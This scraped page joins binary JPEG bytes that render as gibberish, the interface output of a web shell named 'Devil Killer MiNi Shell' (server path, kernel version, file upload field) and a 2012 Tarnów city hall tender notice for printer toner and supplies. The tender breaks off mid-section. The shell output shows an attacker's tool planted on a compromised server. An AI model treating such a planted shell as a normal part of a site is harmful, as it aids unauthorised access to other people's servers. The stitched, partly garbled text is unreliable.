JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120109/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120109/6657-N-2012.html

<p class="kh_header"><b>Tarnów: Zakup materiałów eksploatacyjnych dla potrzeb 
Wydziałów i Biur Urzędu Miasta Tarnowa</b><br>
<b>Numer ogłoszenia: 6657 - 2012; data zamieszczenia: 09.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Administracyjno-Gospodarcze w Centrum Obsługi Urzędu w Urzędzie Miasta Tarnowa , ul. Mickiewicza 2, 33-100 Tarnów, woj. małopolskie, tel. 14 6882400, faks 14 6215308.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup materiałów eksploatacyjnych dla potrzeb 
Wydziałów i Biur Urzędu Miasta Tarnowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)	Przedmiotem zamówienia jest dostawa nieregenerowanych materiałów eksploatacyjnych dla potrzeb Wydziałów i Biur Urzędu Miasta Tarnowa. Szczegółowy wykaz materiałów objętych zamówieniem zawiera załącznik nr 1. Dostawy będą odbywały się do poszczególnych Wydziałów i Biur Urzędu Miasta Tarnowa, zlokalizowanych w budynkach przy przy ul. Nowa 4, ul. Nowa 3, ul Goldhammera 3, ul. Mickiewicza 2, ul. Brodzińskiego 1, ul. Gumniska 30 w dni powszednie w godzinach od 800-1500. Każdorazowo dostawy będą odbywały się na podstawie kierowanych do Dostawcy pisemnych zapotrzebowań, zawierających wskazanie asortymentu wraz z ilością. Zapotrzebowanie przesłane zostanie faksem lub e-mailem najpóźniej w terminie do                   10 dnia każdego miesiąca.
Zamawiający zastrzega sobie, że w przypadku konieczności zrealizowania pilnej dostawy, zapotrzebowanie może zostać skierowane do Dostawcy także w innym terminie. Każda dostawa musi zostać zrealizowana nie później niż w terminie do 3 dni roboczych od daty przekazania pisemnego zapotrzebowania Zamawiającego.

W zakres zamówienia wchodzi także odbiór od Zamawiającego zużytych tuszy i tonerów. Zamawiający nie będzie ponosił z tego tytułu żadnych kosztów.
b) Wielkość zamówienia:
Rodzaj artykułu 
pożądanego przez Zamawiającego	Jedn. miary szt.	Ilość zamawianych produktów
3	4	5
Toner o wydajności 2.000 stron A4 do faksu Panasonic KX-FAT 92 /KX MB 773/	szt.	1
Toner o wydajności 2.500 stron A4 do faksu Panasonic KX-FL 613 /KX-FA 83E/	szt.	6
Toner o wydajności 2000 stron do faksu Panasonic KX-MB 2025 PD /KX-FAT411X/	szt.	5
Atrament czarny o pojemnośći 23 ml do faksu Canon B 820 	szt.	1
Toner o wydajności 6.000 standartowych wydruków A-4 do drukarki HP LJ 2420dn /Q6511A/ 	szt.	1
Toner o wydajności 6.500 standartowych wydruków A-4 do drukarki HP LJ 3005dn /Q7551A/ 	szt.	1
Toner black o wydajności 2.500 standartowych wydruków A-4 do drukarki HP LJ 1600 /Q 6000 A/	szt.	5
Toner cyan o wydajności 2.000 standardowych wydruków A-4 do drukarki HP LJ 1600 /Q6001 A/	szt.	3
Toner yellow o wydajności 2.000 standardowych wydruków A-4 do drukarki HP LJ 1600 /Q 6002 A/	szt.	3
Toner magenta o wydajności 2.000 standartowych wydruków A-4 do drukarki HP LJ 1600 /Q 6003 A/	szt.	3
Toner czarny o wydajności 3.500 standartowych wydruków A-4 do drukarki HP LJ CP 2025 DN /CC530 A/	szt.	2
Toner błękitny o wydajności 2.800 standartowych wydruków A-4 do drukarki HP LJ CP 2025 DN /CM 531A/	szt.	2
Toner żółty o wydajności 2.800 standartowych wydruków A-4 do drukarki HP LJ CP 2025 DN /CM 532A/	szt.	2
Toner purpurowy o wydajności 2.800 standartowych wydruków A-4 do drukarki HP LJ CP 2025 DN /CM 533 A/	szt.	2
Toner black o wydajności 7.000 standartowych wydruków A-4 do drukarki HP LJ CP 5225 dn /CE 740 A/	szt.	1
Toner cyan o wydajności 7.000 standartowych wydruków A-4 do drukarki HP LJ CP 5225 dn /CE 741 A/	szt.	1
Toner yellow o wydajności 7.000 standartowych wydruków A-4 do drukarki HP LJ CP 5225 dn /CE 742 A/	szt.	1
Toner magenta o wydajności 7.000 standartowych wydruków A-4 do drukarki HP LJ CP 5225 dn / CE 743 A /	szt.	1
Toner black o wydajności 2.500 standartowych wydruków A-4 do drukarki Lexmark C 544 dn	szt.	4
Toner cyan o wydajności 2.000 standartowych wydruków A-4 do drukarki Lexmark C 544 dn	szt.	4
Toner magenta o wydajności 2.000 standartowych wydruków A-4 do drukarki Lexmark C 544 dn	szt.	4
Toner yellow o wydajności 2.000 standartowych wydruków A-4 do drukarki Lexmark C 544 dn	szt.	4
Toner o wydajności 2.500 standardowych wydruków A4 do drukarki HP LJ 1100 L /C4092A/ 	szt.	
3
Toner o wydajności 2.500 standardowych wydruków A4 do drukarki HP LJ 1200L /C7115A/ 	szt.	6
Toner o wdajności 5.000 standardowych wydruków A4 do drukarki HP LJ 2100L /4096A/	szt.	1
Toner o wydajności 6.500stron standartowych wydruków A-4 do drukarki HP LJ P2055 dn /CE 505X/	szt.	10
Toner o wydajności 7.000 standartowych wydruków A-4 do drukarki Lexmark T 650 N /T650 A11E/	szt.	15
Toner o wydajności 20.000 standardowych wydruków A4 do drukarki HP LJ 8150N /C4182X/	szt.	4
Toner o wydajności 2.000 standartowych wydruków A4 do drukarki HP LJ 1010 /Q2612A/	szt.	3
Toner o wydajności 2.500 standardowych wydruków A4 drukarki HP LJ 1150 /Q2624A/	szt.	4
Toner o wydajności 2.500 standardowych wydruków A4 do drukarki HP LJ 1320 /Q5949A/	szt.	20
Toner o wydajności 2.000 standardowych wydruków A4 do drukarki Lexmark E120 /12016SE do drukowania dowodów rejestracyjnych/	szt.	8
Toner o wydajności 3.500 standardowych wydruków A-4 do drukarki Lexmark E250 D /E250A11E/	szt.	15
Toner o wydajności 30.000 standardowych wydruków A-4 do drukarki HP LaserJet 9040dn /Q7699A/	szt.	1
Toner o wydajności 3.000 standardowych wydruków A-4 do drukarki Lexmark E321,323 /12A7400/	szt.	1
Toner black o wydajności 6.000 standartowych wydruków A-4do drukarki HPLJ 3600 /Q6470A/	szt.	1
Toner yellow o wydajności 4.000 standartowych wydruków A-4 do drukarki HP LJ 3600 /Q6471A/	szt.	1
Toner cyan o wydajności 4.000 standartowych wydruków A-4 do drukarki HP LJ 3600 /Q6472A/	szt.	1
Toner magenta o wydajności 4.000 standartowych wydruków do drukarki HP LJ 3600 /Q6473A/	szt.	1
Toner o wydajności 6.700 standartowych wydruków A-4 do drukarki Brother HL5150 /TN3060/ 	szt.	1
Toner o wydajności 7.000 standartowych wydruków A- 4 do drukarki HPLJ 2015 dn /Q7553 X/	szt.	20
Toner black o wydajności 38.000 standartowych wydruków A-4 do drukarki Lexmark C935 	szt.	1
Toner magenta o wydajności 24.000 standartowych wydruków A-4 do drukarki Lexmark C935 	szt.	1
Toner yellow o wydajności 24.000 standartowych wydruków A-4 do drukarki Lexmark C935 	szt.	1
Toner cyan o wydajności 24.000 standartowych wydruków A-4 do drukarki Lexmark C935 	szt.	1
Toner o wydajności 9.000 standartowych wydruków A-4 do drukarki Lexmark X 264 dn 	szt.	2
Toner o wydajności 10.000 standartowych wydruków A-4 do drukarki HP LJ 4250N /Q5942A /	szt.	1
Toner o wydajności 11.000 wydruków A-4 do kserokopiarki Minolta /MT 302 b/	szt.	1
Toner o wydajności 30.000 stron A4 do kserokopiarki Ricoh Aficio 2035 /3210D/	szt.	1
Toner o wydajności 6.000 stron A4 do kserokopiarki Ricoh Aficio FT4015 /1205/ 	szt.	1
Toner o wydajności 11.000 stron A4 do kserokopiarki Ricoh Aficio FT 1022 /2220D/ 	szt.	1
Toner o wydajności 10.000 stron A4 do drukarki OKI B 431 d	szt.	3
Toner o wydajności 3.500 stron A4 do drukarki OKI B 430 d	szt.	3
 Atrament black (barwnikowy) do Canon IPF 605 - PFI 102 BK pojemność 130 ml 	szt.	2
 Atrament cyan błękitny do Canon IPF 605 PFI 102 C pojemność 130 ml 	szt.	2
 Atrament magenta purpurowy Canon IPF 605 - PFI 102 M pojemność 130 ml 	szt.	2
 Atrament yellow zółty do Canon IPF 605 PFI 102 Y pojemność 130 ml 	szt.	2
 Atrament matte black do Canon IPF 605 PFI 102 MBK pojemność 130 ml 	szt.	2
 Atrament black do drukarki Brother MFC-795 CW o wydajności 450 stron wydruków A4 	szt.	3
 Atrament cyan do drukarki Brother MFC- 795 CW /o wydajności 325 stron wydruków A4/ 	szt.	2
 Atrament magenta do drukarki Brother MFC- 795CW /o wydajności 325 stron wydruków A4/ 	szt.	2
 Atrament yellow do drukarki Brother MFC- 795 CW /o wydajności 325 stron wydruków A4/ 	szt.	2
 Atrament kolorowy błękitny do drukarki HP Business InkJet 1700 No 11 C4836 A /wydajność wkładu 1750 stron wydruków A4/	szt.	1
 Atrament kolorowy purpurowy do drukarki HP Business InkJet 1700 No 11 C4837A /wydajność wkładu 1750 stron wydruków A4/	szt.	1
 Atrament kolorowy żółty do drukarki HP Business InkJet 1700 No 11 C4838 A /wydajność wkładu 1750 stron wydruku A4/	szt.	1
Atrament czarny do drukarki HP Business InkJet 1700 opakowanie = 69 ml No 10 C4844AE 	szt.	2
Atrament czarny do drukarki HP OfficeJet 5510 opakowanie = 19 ml No 56 C6656 AE	szt.	1
Atrament kolorowy do drukarki HP OfficeJet 5510 opakowanie = 17 ml No 57 C6657AE	szt.	1
Atrament błękitny do plotera HP Designjet 350 No 44 51644CE opakowanie = 42 ml	szt.	1
Atrament purpurowy do plotera HPDesignjet 350 opakowanie = 42 ml No 44 51644ME 	szt.	1
Atrament żółty do plotera HP Designjet 350 opakowanie = 42 ml No 44 51644YE 	szt.	1
Atrament black do drukarki HP Officjet 7000 pojemność = 10 ml /CD 971AE/ 	szt.	2
Atrament yellow do drukarki HP Officjet 7000 pojemność = 6 ml /CD 974AE/ 	szt.	2
Atrament magenta do drukarki HP Officjet 7000 pojemność = 6 ml /CD 973AE/ 	szt.	2
Atrament cyan do drukarki HP Officjet 7000 pojemność = 6 ml /CD 972AE/ 	szt.	2
 Atrament czarny do drukarki HP Deskjet 6540 No 338 C8765EE /wydajność wkładu 450 stron wydruków A4/	szt.	3
Atrament czarny do drukarki HPDeskjet 6540 No 339 C8767EE /wydajność wkładu 860 stron A-4/	szt.	5
Atrament Kolorowy do drukarki HPDeskjet 6540 No 344 C9363EE /wydajność wkładu 560 stron A-4/	szt.	5
Toner o wydajności 3.600 stron A4 do kserokopiarki Canon FC 200 /E-30 /	szt.	1
Toner black o wydajności 20.000 standardowych wydruków A-4 do urządzenia wielofunkcyjnego Nashuatec MPC 2500 (DTC 3000 BLK)	szt.	3
Toner cyjan o wydajności 15.000 standardowych wydruków A-4 do urządzenia wielofunkcyjnego Nashuatec MPC 2500 (DTC 3000 CYN)	szt.	3
Toner magenta o wydajności 15.000 standardowych wydruków A-4 do urządzenia wielofunkcyjnego Nashuatec MPC 2500 (DTC 3000 MGT)	szt.	3
Toner yellow o wydajności 15.000 standardowych wydruków A-4 do urządzenia wielofunkcyjnego Nashuatec MPC 2500 (DTC 3000 YLW)	szt.	3
Toner o wydajności 12.000 standardowych wydruków A-4 do drukarki HP LJ 4200 dn /Q1338A/ 	szt.	2
 Atrament Trójkolorowy do drukarki HPDeskjet 6540 No 343 C8766EE/ /Wydajność wkładu 330 stron wydruków A4/	szt.	4
Atrament czarny do drukarki HP Photosmart C 5180 No 363 C 8719EE opakowanie 17 mln	szt.	2
Taśma o wydajności 3mln znaków kolor czarny do drukarki Oki Microline 9 Pin 320 ml 	szt.	50
Taśma o wydajności 2 mln znaków kolor czarny do drukarki Oki Microline 390 FB 	szt.	50
Taśma o wydajności 4 mln znaków kolor czarny do drukarki Oki 6300 FB 	szt.	3
Taśma 24 Pin o wydajności 2 mln znaków kolor czarny do drukarki igłowej Oki ML 5100 FB	szt.	5
Taśma o wydajności 3 mln znaków kolor czarny do drukarki igłowej Oki ML 3390	szt.	5
Bęben o wydajności 6000 stron A4 do urządzenia wielofunkcyjnego Panasonic KX-FLB 758 	szt.	1
Bęben o wydajności 6.000 stron A4 do urządzenia wielofunkcyjnego Panasonic KX - MB 773	szt.	1
Bęben światłoczuły o wydajności 30.000 Lexmark E250 do drukarki Lexmark E250 /E 250x22 G/	sz	4
Płyty CD 700 MB w pudełku	szt.	300
Płyty DVD 4,7 GB w pudełku	szt.	300
Pendrive o poj. 4 GB USB 2.0 obudowa wstrząsoodporna z zabezpieczeniem złącza	szt.	12.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.21.12-9, 30.19.23.00-4, 30.23.73.80-6, 30.12.43.00-7.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy zaproszeni do udziału w licytacji zobowiązani będą do wniesienia wadium w wysokości 1.000,00 zł w terminie wskazanym w zaproszeniu do wzięcia udziału w licytacji elektronicznej. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Prawo zamówień publicznych, z zastrzeżeniem art. 45 ust. 7 ustawy PZP. 
III.1.1) Wadium w pieniądzu należy wnieść przelewem na konto: Bank Handlowy O/Tarnów NR 76 1030 1250 0000 0000 8800 0099, z zaznaczeniem na dowodzie wpłaty: Wadium -Zakup materiałów eksploatacyjnych dla potrzeb Wydziałów i Biur Urzędu Miasta. Wadium musi wpłynąć na konto Zamawiającego nie później niż w dniu i w godzinie wskazanej w zaproszeniu do wzięcia udziału licytacji elektronicznej. 
III.1.2) W razie wyboru formy wniesienia wadium innej niż pieniądz oryginał dokumentu należy złożyć w Urzędzie Miasta Tarnowa, ul. Nowa 4, pokój 113 , do dnia i godziny wskazanej w zaproszeniu do wzięcia udziału w licytacji elektronicznej. 
III.1.3) Wadium wniesione w pieniądzu Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz koszty prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
III.1.4) Wykonawca, którego oferta zostanie wybrana traci wadium wraz z odsetkami na rzecz Zamawiającego, w przypadkach określonych w art. 46 ust. 5 pkt 1 i pkt 3 ustawy pzp.
III.1.5) Wykonawca, który nie wniesie wadium w wyznaczonym terminie, nie zostanie dopuszczony do licytacji.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia, o którym mowa w pkt III.4.1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia,
o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia,
o którym mowa w pkt III.4.1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku.
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu wykazania, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 2 ustawy, przedkłada on oświadczenia określone w pkt III.4.1. 
2.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (art. 26 ust. 2b ustawy Pzp).
4.	W przypadku, gdy uprawnienie do podpisania wniosku i oświadczeń nie wynika z dokumentu, o którym mowa w pkt III.4.2, do wniosku należy załączyć stosowne pełnomocnictwo podpisane przez osobę(y) uprawnioną(e) do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy. 
5.	Pełnomocnictwa złożone do przetargu mają być podpisane przez osobę upoważnioną do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy. Pełnomocnictwo należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie (zgodnie z wyrokiem Sądu Okręgowego w Warszawie z dnia 31.01.2007 r., sygn. akt V Ca 85/07). Pełnomocnictwo w sposób jednoznaczny ma określać do jakich czynności upoważniona jest osoba.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w przypadkach:
a)	zmiany stawek podatku od towarów i usług - w takim przypadku wynagrodzenie wykonawcy zostanie odpowiednio pomniejszone lub powiększone,
b)	przekształceń wykonawcy lub zbycia przedsiębiorstwa. 
c)	zmiany danych adresowych Stron lub zmiany rachunku bankowego Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> licytacje.uzp.gov.pl.</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> Szczegółowy opis przedmiotu zamówienia zawiera rozdz. II.1.3) niniejszego ogłoszenia, zamieszczonego</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> IV.4.8.1) Wykonawcy chcący wziąć udział w przedmiotowej licytacji są zobowiązani do dokonania uprzedniej rejestracji na platformie do prowadzenia licytacji elektronicznych, zwanej dalej platformą, oraz do przesłania swojego LOGIN-u Zamawiającemu, wypełniając informację we wniosku o dopuszczenie do udziału w licytacji elektronicznej. Wniosek o dopuszczenie do udziału w licytacji elektronicznej stanowi załącznik nr 2 do ogłoszenia
 
